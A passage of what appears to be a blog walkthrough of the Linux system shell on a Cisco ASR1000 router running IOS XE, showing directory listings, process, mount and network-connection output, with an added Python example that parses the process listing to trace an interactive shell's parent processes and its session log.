_=setenv

[ASR1k_RP_0:/]$ ls /bin
arch dmesg ipcalc netstat sleep true
basename doexec kill nice sort tsort
bash du ln nohup split tty
cat echo login od start-stop-daemon umount
chgrp egrep logname ping stat uname
chmod env ls printenv stty uniq
chown expr lsmod ps sync uptime
chroot false mcp_pkg_wrap pwd tail usleep
comm fgrep md5sum readlink tar vi
cp gdbserver mkdir rm tcsh wc
cut get_me_bash mkfifo rmdir tee who
date grep mknod sed test whoami
dd head mktemp seq touch x86_64-gdbserver
df hostname mount sh tr yes
dirname id mv sha1sum tracepath

[ASR1k_RP_0:/]$ ls /sbin
agetty e2label ifconfig mkdosfs portmap swapon
arp fdisk ifdown mke2fs poweroff sysctl
badblocks fsck ifup mkfs reboot syslogd
blkid fsck.ext2 init mkfs.ext2 resize2fs telinit
blockdev fsck.ext3 initlog mkfs.ext3 rmmod tune2fs
cfdisk fsck.msdos insmod mkfs.msdos route udevcontrol
chvrf fsck.vfat ip mkfs.vfat runlevel udevd
consoletype fuser iptables mkswap service udevsettle
ctrlaltdel genhostid iptables-restore modinfo setsysfont udevtrigger
depmod getkey iptables-save modprobe sfdisk
dosfsck halt killall5 nameif shutdown
dumpe2fs hdparm klogd pidof start_udev
e2image hwclock lsof pivot_root sulogin


Check the running processes (iosd is the IOS XE one):


[ASR1k_RP_0:/]$ ps -elf
F S UID PID PPID C PRI NI ADDR SZ WCHAN STIME TTY TIME CMD
4 S root 1 0 0 80 0 - 434 - Jan19 ? 00:00:01 init [3]
1 S root 2 1 0 -40 0 - 0 migrat Jan19 ? 00:00:00 [migration/0]
1 S root 3 1 0 99 19 - 0 ksofti Jan19 ? 00:00:01 [ksoftirqd/0]
5 S root 4 1 0 -40 0 - 0 watchd Jan19 ? 00:00:00 [watchdog/0]
1 S root 5 1 0 -40 0 - 0 migrat Jan19 ? 00:00:00 [migration/1]
1 S root 6 1 0 99 19 - 0 ksofti Jan19 ? 00:00:00 [ksoftirqd/1]
5 S root 7 1 0 -40 0 - 0 watchd Jan19 ? 00:00:00 [watchdog/1]
5 S root 8 1 0 75 -5 - 0 worker Jan19 ? 00:00:00 [events/0]
1 S root 9 1 0 75 -5 - 0 worker Jan19 ? 00:00:00 [events/1]
1 S root 10 1 0 75 -5 - 0 worker Jan19 ? 00:00:00 [khelper]
1 S root 11 1 0 75 -5 - 0 worker Jan19 ? 00:00:00 [kthread]
1 S root 15 11 0 75 -5 - 0 worker Jan19 ? 00:00:00 [kblockd/0]
1 S root 16 11 0 75 -5 - 0 worker Jan19 ? 00:00:00 [kblockd/1]
1 S root 17 11 0 75 -5 - 0 worker Jan19 ? 00:00:00 [kacpid]
1 S root 138 11 0 75 -5 - 0 hub_th Jan19 ? 00:00:00 [khubd]
1 S root 202 11 0 80 0 - 0 pdflus Jan19 ? 00:00:00 [pdflush]
1 S root 203 11 0 80 0 - 0 pdflus Jan19 ? 00:00:00 [pdflush]
1 S root 204 11 0 75 -5 - 0 kswapd Jan19 ? 00:00:00 [kswapd0]
1 S root 205 11 0 75 -5 - 0 worker Jan19 ? 00:00:00 [aio/0]
1 S root 206 11 0 75 -5 - 0 worker Jan19 ? 00:00:00 [aio/1]
1 S root 818 11 0 75 -5 - 0 worker Jan19 ? 00:00:00 [ata/0]
1 S root 819 11 0 75 -5 - 0 worker Jan19 ? 00:00:00 [ata/1]
1 S root 820 11 0 75 -5 - 0 worker Jan19 ? 00:00:00 [ata_aux]
1 S root 822 11 0 75 -5 - 0 scsi_e Jan19 ? 00:00:00 [scsi_eh_0]
1 S root 823 11 0 75 -5 - 0 scsi_e Jan19 ? 00:00:00 [scsi_eh_1]
1 S root 824 11 0 75 -5 - 0 scsi_e Jan19 ? 00:00:00 [scsi_eh_2]
1 S root 825 11 0 75 -5 - 0 scsi_e Jan19 ? 00:00:00 [scsi_eh_3]
1 S root 860 11 0 75 -5 - 0 scsi_e Jan19 ? 00:00:00 [scsi_eh_4]
1 S root 861 11 0 75 -5 - 0 - Jan19 ? 00:00:01 [usb-storage]
1 S root 1765 1 0 60 -20 - 0 loop_t Jan19 ? 00:00:00 [loop0]
5 S bin 1896 1 0 80 0 - 428 117466 Jan19 ? 00:00:04 portmap
1 S root 1950 1 0 60 -20 - 0 loop_t Jan19 ? 00:00:00 [loop1]
1 S root 1988 1 0 60 -20 - 0 loop_t Jan19 ? 00:00:00 [loop2]
1 S root 2026 1 0 60 -20 - 0 loop_t Jan19 ? 00:00:00 [loop3]
1 S root 2064 1 0 60 -20 - 0 loop_t Jan19 ? 00:00:00 [loop4]
1 S root 2174 1 0 60 -20 - 0 loop_t Jan19 ? 00:00:00 [loop5]
1 S root 2212 1 0 60 -20 - 0 loop_t Jan19 ? 00:00:00 [loop6]
1 S root 2286 1 0 60 -20 - 0 loop_t Jan19 ? 00:00:00 [loop7]
5 S root 11175 1 0 76 -4 - 410 - Jan19 ? 00:00:00 /sbin/udevd -d
0 S root 12396 1 0 80 0 - 613 - Jan19 ttyS1 00:00:00 /bin/bash /etc/auxinit.sh --
5 S root 12513 1 0 80 0 - 431 171798 Jan19 ? 00:00:00 /usr/sbin/automount --timeout=60 /vol file /etc/auto.vol
5 S root 12543 1 0 80 0 - 513 - Jan19 ? 00:00:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
5 S root 12545 1 0 80 0 - 514 - Jan19 ? 00:00:00 xinetd -stayalive -pidfile /var/run/xinetd_telnetd.pid -f /etc/xinetd_telnetd.conf
5 S root 12574 1 0 80 0 - 0 - Jan19 ? 00:00:00 [nfsd]
1 S root 12575 1 0 80 0 - 0 - Jan19 ? 00:00:00 [nfsd]
1 S root 12576 1 0 80 0 - 0 - Jan19 ? 00:00:00 [nfsd]
1 S root 12577 1 0 80 0 - 0 - Jan19 ? 00:00:00 [nfsd]
1 S root 12578 1 0 80 0 - 0 - Jan19 ? 00:00:00 [nfsd]
1 S root 12579 1 0 80 0 - 0 - Jan19 ? 00:00:00 [nfsd]
1 S root 12580 1 0 80 0 - 0 - Jan19 ? 00:00:00 [nfsd]
1 S root 12581 1 0 80 0 - 0 - Jan19 ? 00:00:00 [nfsd]
1 S root 12582 1 0 80 0 - 0 - Jan19 ? 00:00:00 [lockd]
1 S root 12583 11 0 75 -5 - 0 worker Jan19 ? 00:00:00 [rpciod/0]
1 S root 12584 11 0 75 -5 - 0 worker Jan19 ? 00:00:00 [rpciod/1]
1 S root 12586 1 0 80 0 - 421 - Jan19 ? 00:03:39 rpc.mountd
1 S root 12667 1 0 70 -10 - 0 lsmpi_ Jan19 ? 00:00:09 [lsmpi-refill]
1 S root 12668 1 0 70 -10 - 0 lsmpi_ Jan19 ? 00:30:30 [lsmpi-xmit]
1 S root 12669 1 0 70 -10 - 0 lsmpi_ Jan19 ? 00:29:09 [lsmpi-rx]
1 S root 13029 11 0 75 -5 - 0 184466 Jan19 ? 00:00:00 [ddr_err_monitor]
1 S root 13052 1 0 80 0 - 0 mtd_bl Jan19 ? 00:00:00 [mtdblockd]
5 S root 18573 1 0 80 0 - 383 syslog Jan19 ? 00:00:00 /sbin/klogd -2
4 S root 18585 1 0 80 0 - 866 pipe_w Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/pvp.sh
0 S root 18622 1 0 80 0 - 1119 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f pvp -p /tmp/rp/trace/fifo/pvp_sh%rp_0_0_18585_fifo
0 S root 18822 18585 0 80 0 - 407 - Jan19 ? 00:00:00 inotifywait -m --format %w,%-e,%f -e DELETE -e CREATE /tmp/rp/pvp/control /tmp/rp/pvp/process /tmp/rp/chasfs/pman
4 S root 18899 18585 0 69 -11 - 853 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/rp/0/0/rp_base/mount/usr/binos/conf/pman.sh
0 S root 18969 1 0 80 0 - 1120 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/rp/trace/btrace_rotate_sh_pmanlog -p /tmp/rp/trace/fifo/pman_sh%rp_0_0_18899_fifo
4 S root 19093 18585 0 69 -11 - 847 wait Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/pman.sh
4 S root 19168 18899 0 80 0 - 776 wait Jan19 ? 00:03:33 /bin/bash /tmp/sw/mount/asr1000rp2-rpbase.02.04.02.122-33.XND2.pkg/usr/binos/conf/btrace_rotate.sh -f rp -s /tmp/rp/trace/stage -w /tmp/rp/trace -n 25
0 S root 19261 1 0 80 0 - 1121 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/rp/trace/cmand_pmanlog -p /tmp/rp/trace/fifo/pman_sh%rp_0_0_19093_fifo
4 S root 19308 18585 0 69 -11 - 848 wait Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/pman.sh
0 S root 19314 1 0 80 0 - 1120 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f btrace_rotate_sh -p /tmp/rp/trace/fifo/btrace_rotate_sh%rp_0_0_19168_fifo
0 S root 19376 1 0 80 0 - 1120 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/rp/trace/emd_pmanlog -p /tmp/rp/trace/fifo/pman_sh%rp_0_0_19308_fifo
4 S root 19516 18585 0 69 -11 - 849 wait Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/pman.sh
4 S root 19548 19093 0 80 0 - 4759 - Jan19 ? 00:10:55 /tmp/sw/mount/asr1000rp2-rpcontrol.02.04.02.122-33.XND2.pkg/usr/binos/bin/cmand
4 S root 19554 19308 0 80 0 - 3509 - Jan19 ? 00:24:41 /tmp/sw/mount/asr1000rp2-rpcontrol.02.04.02.122-33.XND2.pkg/usr/binos/bin/emd
0 S root 19627 1 0 80 0 - 1121 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/rp/trace/fman_rp_pmanlog -p /tmp/rp/trace/fifo/pman_sh%rp_0_0_19516_fifo
4 S root 19819 18585 0 69 -11 - 848 wait Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/pman.sh
4 S root 19866 19516 0 80 0 - 212518 - Jan19 ? 02:29:34 /tmp/sw/mount/asr1000rp2-rpcontrol.02.04.02.122-33.XND2.pkg/usr/binos/bin/fman_rp -N
0 S root 19922 1 0 80 0 - 1119 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/rp/trace/hman_pmanlog -p /tmp/rp/trace/fifo/pman_sh%rp_0_0_19819_fifo
4 S root 20092 18585 0 69 -11 - 848 wait Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/pman.sh
0 S root 20269 1 0 80 0 - 1119 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/rp/trace/imand_pmanlog -p /tmp/rp/trace/fifo/pman_sh%rp_0_0_20092_fifo
4 S root 20293 19819 0 80 0 - 2903 - Jan19 ? 00:07:30 /tmp/sw/mount/asr1000rp2-rpcontrol.02.04.02.122-33.XND2.pkg/usr/binos/bin/hman -c
4 S root 20527 18585 0 69 -11 - 850 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/rp/0/0/rp_base/mount/usr/binos/conf/pman.sh
0 S root 20569 20092 0 80 0 - 5693 - Jan19 ? 00:06:48 /tmp/sw/mount/asr1000rp2-rpcontrol.02.04.02.122-33.XND2.pkg/usr/binos/bin/imand
0 S root 20635 1 0 80 0 - 1121 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/rp/trace/periodic_sh_pmanlog -p /tmp/rp/trace/fifo/pman_sh%rp_0_0_20527_fifo
4 S root 20679 18585 0 69 -11 - 847 wait Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/pman.sh
0 S root 20760 1 0 80 0 - 1119 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/rp/trace/plogd_pmanlog -p /tmp/rp/trace/fifo/pman_sh%rp_0_0_20679_fifo
4 S root 20835 20527 0 80 0 - 773 wait Jan19 ? 00:00:01 /bin/bash /tmp/sw/mount/asr1000rp2-rpbase.02.04.02.122-33.XND2.pkg/usr/binos/conf/periodic.sh
0 S root 20918 1 0 80 0 - 1121 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f periodic -p /tmp/rp/trace/fifo/periodic_sh%rp_0_0_20835_fifo
4 S root 20963 18585 0 69 -11 - 848 wait Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/pman.sh
0 S root 21009 20679 0 80 0 - 2974 - Jan19 ? 00:00:01 /tmp/sw/mount/asr1000rp2-rpcontrol.02.04.02.122-33.XND2.pkg/usr/binos/bin/plogd
0 S root 21122 1 0 80 0 - 1118 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/rp/trace/ppc_linux_iosd_image_pmanlog -p /tmp/rp/trace/fifo/pman_sh%rp_0_0_20963_fifo
4 R root 21480 20963 21 80 0 - 1281874 stext Jan19 ? 2-19:10:17 /tmp/sw/mount/asr1000rp2-rpios-advipservicesk9.02.04.02.122-33.XND2.pkg/usr/binos/bin/ppc_linux_iosd-image -n 32768 -m 4400 -c /config
4 S root 21537 18585 0 69 -11 - 848 wait Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/pman.sh
0 S root 21595 1 0 80 0 - 1119 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/rp/trace/psd_pmanlog -p /tmp/rp/trace/fifo/pman_sh%rp_0_0_21537_fifo
4 S root 21709 18585 0 69 -11 - 849 wait Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/pman.sh
0 S root 21818 1 0 80 0 - 1120 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/rp/trace/smand_pmanlog -p /tmp/rp/trace/fifo/pman_sh%rp_0_0_21709_fifo
4 S root 21936 18585 0 69 -11 - 853 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/rp/0/0/rp_base/mount/usr/binos/conf/pman.sh
4 S root 21942 21537 0 80 0 - 3792 - Jan19 ? 00:00:00 /tmp/sw/mount/asr1000rp2-rpaccess.02.04.02.122-33.XND2.pkg/usr/binos/bin/psd -f /tmp/sw/rp/0/0/rp_security/mount/etc/psd/psd.xml
4 S root 21982 21709 0 80 0 - 16880 - Jan19 ? 00:12:42 /tmp/sw/mount/asr1000rp2-rpcontrol.02.04.02.122-33.XND2.pkg/usr/binos/bin/smand -i /tmp/sw/rp/0/0/rp_daemons/mount/usr/binos/conf/cdl.xml -H /tmp/sw/rp/0/0/rp_daemons/mount/usr/binos/conf/cp_status.conf
0 S root 22045 1 0 80 0 - 1121 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/rp/trace/sort_files_by_inode_sh_pmanlog -p /tmp/rp/trace/fifo/pman_sh%rp_0_0_21936_fifo
0 S root 22190 21936 0 80 0 - 627 wait Jan19 ? 00:00:15 /bin/bash /tmp/sw/mount/asr1000rp2-rpbase.02.04.02.122-33.XND2.pkg/usr/binos/conf/sort_files_by_inode.sh
0 S root 25116 1 0 80 0 - 613 wait Jan19 ? 00:00:00 /bin/sh /usr/binos/conf/mcp_chvrf.sh liin /usr/sbin/xinetd -f /tmp/etc/xinetd_brelay_liin.conf -dontfork
0 S root 25117 1 0 80 0 - 613 wait Jan19 ? 00:00:00 /bin/sh /usr/binos/conf/mcp_chvrf.sh eobc /usr/sbin/xinetd -f /tmp/etc/xinetd_brelay_eobc.conf -dontfork
4 S root 25119 1 0 80 0 - 436 - Jan19 ? 00:00:00 /usr/bin/sntp -S
4 S root 25120 1 0 80 0 - 698 pipe_w Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/rollback_timer.sh
0 S root 25122 25116 0 80 0 - 515 - Jan19 ? 00:00:00 /usr/sbin/xinetd -f /tmp/etc/xinetd_brelay_liin.conf -dontfork
4 S root 25124 1 0 80 0 - 687 wait Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/oom.sh
4 S root 25125 1 0 80 0 - 803 pipe_w Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/chasync.sh
4 S root 25126 1 0 80 0 - 769 pipe_w Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/iptbl.sh
0 S root 25127 25117 0 80 0 - 514 - Jan19 ? 00:00:00 /usr/sbin/xinetd -f /tmp/etc/xinetd_brelay_eobc.conf -dontfork
0 S root 25174 1 0 80 0 - 1118 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f inst_rollback_timer -p /tmp/rp/trace/fifo/rollback_timer_sh%rp_0_0_25120_fifo
0 S root 25386 1 0 80 0 - 1118 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f chasync -p /tmp/rp/trace/fifo/chasync_sh%rp_0_0_25125_fifo
0 S root 25426 1 0 80 0 - 1118 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f iptbl -p /tmp/rp/trace/fifo/iptbl_sh%rp_0_0_25126_fifo
0 S root 25453 1 0 80 0 - 1118 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f oom -p /tmp/rp/trace/fifo/oom_sh%rp_0_0_25124_fifo
0 S root 25454 25126 0 80 0 - 407 - Jan19 ? 00:00:00 inotifywait -r -m --format %w,%-e,%f -e create /tmp/rp/chasfs/etc/iptbl
1 S root 25473 25124 0 80 0 - 692 wait Jan19 ? 00:00:01 /bin/bash /usr/binos/conf/oom.sh
0 S root 25546 25120 0 80 0 - 406 - Jan19 ? 00:00:00 inotifywait -m --format %w,%-e,%f -e DELETE -e CREATE /bootflash/.rollback_timer /tmp/rp/rollback_timer
0 S root 25558 25125 0 80 0 - 410 - Jan19 ? 00:00:00 inotifywait -r -m --format %w,%-e,%f -e close_write -e move -e create -e delete /tmp/rp/chasfs/inventory /tmp/rp/chasfs/mastership /tmp/rp/chasfs/etc/prst_sync /tmp/rp/chasfs/etc/system_shell_access_logs
4 S root 6255 25122 0 80 0 - 772 wait 11:58 ? 00:00:00 /bin/bash /usr/binos/conf/in.telnetd.sh -L /usr/binos/conf/brelay.sh
4 S root 6322 6255 0 80 0 - 1211 - 11:58 ? 00:00:00 in.telnetd: 192.168.0.2
0 S root 6323 6322 0 80 0 - 771 wait 11:58 ttyp0 00:00:00 /bin/bash /usr/binos/conf/brelay.sh -h 192.168.0.2 -p
4 S binos 6390 6323 0 80 0 - 749 wait 11:58 ttyp0 00:00:00 /bin/sh /usr/binos/conf/bexec.sh -c /usr/binos/conf/mcp_record_shell.sh -e BINOS_USER_NAME=?BINOS_USER_TTY=vty 0?BINOS_USER_UI_CLIENT=ios?
0 S binos 6393 6390 0 80 0 - 741 wait 11:58 ttyp0 00:00:00 /bin/sh /usr/binos/conf/mcp_chvrf.sh eobc /usr/binos/conf/bexecute.sh -c /usr/binos/conf/mcp_record_shell.sh
4 S root 6394 6393 0 80 0 - 724 wait 11:58 ttyp0 00:00:00 /bin/sh /usr/binos/conf/mcp_record_shell.sh
0 S root 6449 6394 0 80 0 - 398 - 11:58 ttyp0 00:00:00 /usr/bin/script -q /harddisk/tracelogs/system_shell_R0.log.20100201115823
1 S root 6451 6449 0 80 0 - 399 - 11:58 ttyp0 00:00:00 /usr/bin/script -q /harddisk/tracelogs/system_shell_R0.log.20100201115823
0 S root 6452 6451 0 80 0 - 638 wait 11:58 ttyp1 00:00:00 bash -i
0 S root 10744 25473 0 80 0 - 449 - 12:02 ? 00:00:00 sleep 100
0 S root 11483 22190 0 80 0 - 451 - 12:03 ? 00:00:00 sleep 45
0 S root 12291 20835 0 80 0 - 451 - 12:03 ? 00:00:00 sleep 300
0 S root 12416 19168 0 80 0 - 406 - 12:03 ? 00:00:00 inotifywait -t 60 -q -q /tmp/rp/trace/stage /harddisk/tracelogs
4 R root 12418 6452 0 80 0 - 659 - 12:03 ttyp1 00:00:00 ps -elf
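
The listing above is easier to audit as a parent chain than as a flat list. The following is an added example, not part of the original post: it parses `ps -elf` output, walks from the interactive shell up to its listener, and reports the file that the `script` wrapper in that chain writes the session to. The sample lines are copied from the listing above; the function names are chosen here, and only `script` options without a value (such as `-q`) are handled.

```python
import os

# Lines copied from the `ps -elf` listing above: the telnet-launched shell
# and its ancestors. Everything else in the listing is left out.
PS_SAMPLE = """\
0 S root 25116 1 0 80 0 - 613 wait Jan19 ? 00:00:00 /bin/sh /usr/binos/conf/mcp_chvrf.sh liin /usr/sbin/xinetd -f /tmp/etc/xinetd_brelay_liin.conf -dontfork
0 S root 25122 25116 0 80 0 - 515 - Jan19 ? 00:00:00 /usr/sbin/xinetd -f /tmp/etc/xinetd_brelay_liin.conf -dontfork
4 S root 6255 25122 0 80 0 - 772 wait 11:58 ? 00:00:00 /bin/bash /usr/binos/conf/in.telnetd.sh -L /usr/binos/conf/brelay.sh
4 S root 6322 6255 0 80 0 - 1211 - 11:58 ? 00:00:00 in.telnetd: 192.168.0.2
0 S root 6323 6322 0 80 0 - 771 wait 11:58 ttyp0 00:00:00 /bin/bash /usr/binos/conf/brelay.sh -h 192.168.0.2 -p
4 S binos 6390 6323 0 80 0 - 749 wait 11:58 ttyp0 00:00:00 /bin/sh /usr/binos/conf/bexec.sh -c /usr/binos/conf/mcp_record_shell.sh -e BINOS_USER_NAME=?BINOS_USER_TTY=vty 0?BINOS_USER_UI_CLIENT=ios?
0 S binos 6393 6390 0 80 0 - 741 wait 11:58 ttyp0 00:00:00 /bin/sh /usr/binos/conf/mcp_chvrf.sh eobc /usr/binos/conf/bexecute.sh -c /usr/binos/conf/mcp_record_shell.sh
4 S root 6394 6393 0 80 0 - 724 wait 11:58 ttyp0 00:00:00 /bin/sh /usr/binos/conf/mcp_record_shell.sh
0 S root 6449 6394 0 80 0 - 398 - 11:58 ttyp0 00:00:00 /usr/bin/script -q /harddisk/tracelogs/system_shell_R0.log.20100201115823
1 S root 6451 6449 0 80 0 - 399 - 11:58 ttyp0 00:00:00 /usr/bin/script -q /harddisk/tracelogs/system_shell_R0.log.20100201115823
0 S root 6452 6451 0 80 0 - 638 wait 11:58 ttyp1 00:00:00 bash -i
"""


def parse_ps(text):
    """Return {pid: {ppid, uid, tty, cmd}} from `ps -elf` output.

    Column order: F S UID PID PPID C PRI NI ADDR SZ WCHAN STIME TTY TIME CMD.
    CMD may contain spaces, so only the first 14 columns are split off.
    """
    procs = {}
    for line in text.splitlines():
        f = line.split(None, 14)
        if len(f) < 15 or not (f[3].isdigit() and f[4].isdigit()):
            continue  # header or truncated line
        procs[int(f[3])] = {"ppid": int(f[4]), "uid": f[2],
                            "tty": f[12], "cmd": f[14]}
    return procs


def ancestry(procs, pid):
    """PIDs from `pid` upward until the parent is not in the listing."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:  # `seen` guards against loops
        seen.add(pid)
        chain.append(pid)
        pid = procs[pid]["ppid"]
    return chain


def interactive_shells(procs):
    """PIDs of shells started with -i (as `bash -i` is in the listing)."""
    hits = []
    for pid, p in procs.items():
        argv = p["cmd"].split()
        if os.path.basename(argv[0]) in ("bash", "sh") and "-i" in argv[1:]:
            hits.append(pid)
    return sorted(hits)


def session_log(procs, pid):
    """Typescript file of the nearest `script` ancestor, or None."""
    for anc in ancestry(procs, pid)[1:]:
        argv = procs[anc]["cmd"].split()
        if os.path.basename(argv[0]) == "script":
            # First non-option argument is the output file; `script`
            # falls back to ./typescript when none is given.
            files = [a for a in argv[1:] if not a.startswith("-")]
            return files[0] if files else "typescript"
    return None


if __name__ == "__main__":
    procs = parse_ps(PS_SAMPLE)
    for shell in interactive_shells(procs):
        print("shell pid %d, recorded to: %s" % (shell, session_log(procs, shell)))
        for pid in ancestry(procs, shell):
            p = procs[pid]
            print("  %-6d %-6s %-6s %s" % (pid, p["uid"], p["tty"], p["cmd"][:70]))
```
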


Check the mounted directories:


[ASR1k_RP_0:/]$ mount
rootfs on / type rootfs (rw)
tmpfs on /tmp type tmpfs (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
none on /dev type tmpfs (rw)
/dev/bootflash1 on /bootflash type ext2 (rw)
/dev/loop1 on /tmp/sw/mount/asr1000rp2-rpbase.02.04.02.122-33.XND2.pkg type iso9660 (ro)
/dev/loop2 on /tmp/sw/mount/asr1000rp2-rpcontrol.02.04.02.122-33.XND2.pkg type iso9660 (ro)
/dev/loop3 on /tmp/sw/mount/asr1000rp2-rpios-advipservicesk9.02.04.02.122-33.XND2.pkg type iso9660 (ro)
/dev/loop4 on /tmp/sw/mount/asr1000rp2-rpaccess.02.04.02.122-33.XND2.pkg type iso9660 (ro)
/dev/loop5 on /tmp/sw/mount/asr1000rp2-espbase.02.04.02.122-33.XND2.pkg type iso9660 (ro)
/dev/loop6 on /tmp/sw/mount/asr1000rp2-sipbase.02.04.02.122-33.XND2.pkg type iso9660 (ro)
/dev/loop7 on /tmp/sw/mount/asr1000rp2-sipspa.02.04.02.122-33.XND2.pkg type iso9660 (ro)
none on /dev type tmpfs (rw)
/proc/bus/usb on /proc/bus/usb type usbfs (rw)
automount(pid12513) on /vol type autofs (rw,fd=4,pgrp=12513,timeout=60,minproto=2,maxproto=4,indirect)
/dev/harddisk1 on /vol/harddisk type ext2 (rw,noatime,nodiratime)


You'll find the internal hard disk under /vol:


[ASR1k_RP_0:/]$ ls -al /vol
total 4
drwxr-xr-x 3 root root 0 Jan 22 11:39 .
drwxr-xr-x 19 904735 25 0 Jan 22 12:44 ..
drwxr-xr-x 5 root root 4096 Aug 10 05:25 harddisk

[ASR1k_RP_0:/]$ ls -al /vol/harddisk/
total 48
drwxr-xr-x 5 root root 4096 Aug 10 05:25 .
drwxr-xr-x 3 root root 0 Jan 22 11:39 ..
drwxr-xr-x 2 root root 4096 Sep 9 08:41 core
drwx------ 2 root root 16384 Aug 10 05:11 lost+found
drwxrwxrwx 2 root root 24576 Feb 1 10:22 tracelogs


You can check tracelogs messages directly from IOS using the "sh platform software trace message" command.

To see the IOS XE packages, which are mounted as loop devices:


[ASR1k_RP_0:/]$ ls -al /tmp/sw/mount
total 14
drwxr-xr-x 9 root root 180 Jan 19 06:57 .
drwxr-xr-x 14 root root 280 Jan 19 06:58 ..
dr-xr-xr-x 9 root root 2048 Nov 5 08:47 asr1000rp2-espbase.02.04.02.122-33.XND2.pkg
dr-xr-xr-x 7 root root 2048 Nov 5 09:03 asr1000rp2-rpaccess.02.04.02.122-33.XND2.pkg
dr-xr-xr-x 9 root root 2048 Nov 5 09:02 asr1000rp2-rpbase.02.04.02.122-33.XND2.pkg
dr-xr-xr-x 6 root root 2048 Nov 5 09:03 asr1000rp2-rpcontrol.02.04.02.122-33.XND2.pkg
dr-xr-xr-x 6 root root 2048 Nov 5 09:02 asr1000rp2-rpios-advipservicesk9.02.04.02.122-33.XND2.pkg
dr-xr-xr-x 9 root root 2048 Nov 5 08:46 asr1000rp2-sipbase.02.04.02.122-33.XND2.pkg
dr-xr-xr-x 6 root root 2048 Nov 5 08:46 asr1000rp2-sipspa.02.04.02.122-33.XND2.pkg


Determine the file type of python (which is included in one of the IOS XE packages):


[ASR1k_RP_0:/]$ file /tmp/sw/mount/asr1000rp2-rpaccess.02.04.02.122-33.XND2.pkg/usr/bin/python
/tmp/sw/mount/asr1000rp2-rpaccess.02.04.02.122-33.XND2.pkg/usr/bin/python: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.6.18, dynamically linked (uses shared libs), stripped


Check connections:

[ASR1k_RP_0:/]$ netstat -av
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:2400 *:* LISTEN
tcp 0 0 *:nfs *:* LISTEN
tcp 0 0 *:2402 *:* LISTEN
tcp 0 0 *:2404 *:* LISTEN
tcp 0 0 *:2406 *:* LISTEN
tcp 0 0 *:2408 *:* LISTEN
tcp 0 0 *:rsync *:* LISTEN
tcp 0 0 *:2410 *:* LISTEN
tcp 0 0 *:2412 *:* LISTEN
tcp 0 0 *:daytime *:* LISTEN
tcp 0 0 *:2414 *:* LISTEN
tcp 0 0 *:sunrpc *:* LISTEN
tcp 0 0 *:2416 *:* LISTEN
tcp 0 0 *:2000 *:* LISTEN
tcp 0 0 *:2001 *:* LISTEN
tcp 0 0 *:2418 *:* LISTEN
tcp 0 0 *:2002 *:* LISTEN
tcp 0 0 *:2004 *:* LISTEN
tcp 0 0 *:2420 *:* LISTEN
tcp 0 0 *:2006 *:* LISTEN
tcp 0 0 rp0-1:16023 *:* LISTEN
tcp 0 0 rp0-0:16023 *:* LISTEN
tcp 0 0 192.168.0.1:16023 *:* LISTEN
tcp 0 0 *:2007 *:* LISTEN
tcp 0 0 *:telnet *:* LISTEN
tcp 0 0 *:2008 *:* LISTEN
tcp 0 0 *:42873 *:* LISTEN
tcp 0 0 *:893 *:* LISTEN
tcp 0 0 rp0-0:50835 rp0-0:2007 ESTABLISHED
tcp 0 0 rp0-0:52708 rp0-0:2007 ESTABLISHED
tcp 0 0 rp0-0:51935 rp0-0:2007 ESTABLISHED
tcp 0 0 rp0-0:60769 rp0-0:2007 ESTABLISHED
tcp 0 0 rp0-0:59605 rp0-0:2007 ESTABLISHED
tcp 0 0 rp0-0:38252 rp0-0:2007 ESTABLISHED
tcp 0 0 rp0-0:2007 rp0-0:42307 ESTABLISHED
tcp 0 0 rp0-0:33999 rp0-0:2007 ESTABLISHED
tcp 0 0 rp0-0:36453 rp0-0:2007 ESTABLISHED
tcp 0 0 rp0-0:2007 rp0-0:36453 ESTABLISHED
tcp 0 0 rp0-0:2007 rp0-0:60769 ESTABLISHED
tcp 0 0 rp0-0:2007 rp0-0:38252 ESTABLISHED
tcp 0 0 rp0-0:42307 rp0-0:2007 ESTABLISHED
tcp 0 0 rp0-0:2007 rp0-0:50835 ESTABLISHED
tcp 0 0 rp0-0:41683 rp0-0:2404 TIME_WAIT
tcp 0 0 rp0-0:2007 rp0-0:33999 ESTABLISHED
tcp 0 0 rp0-0:2007 rp0-0:59605 ESTABLISHED
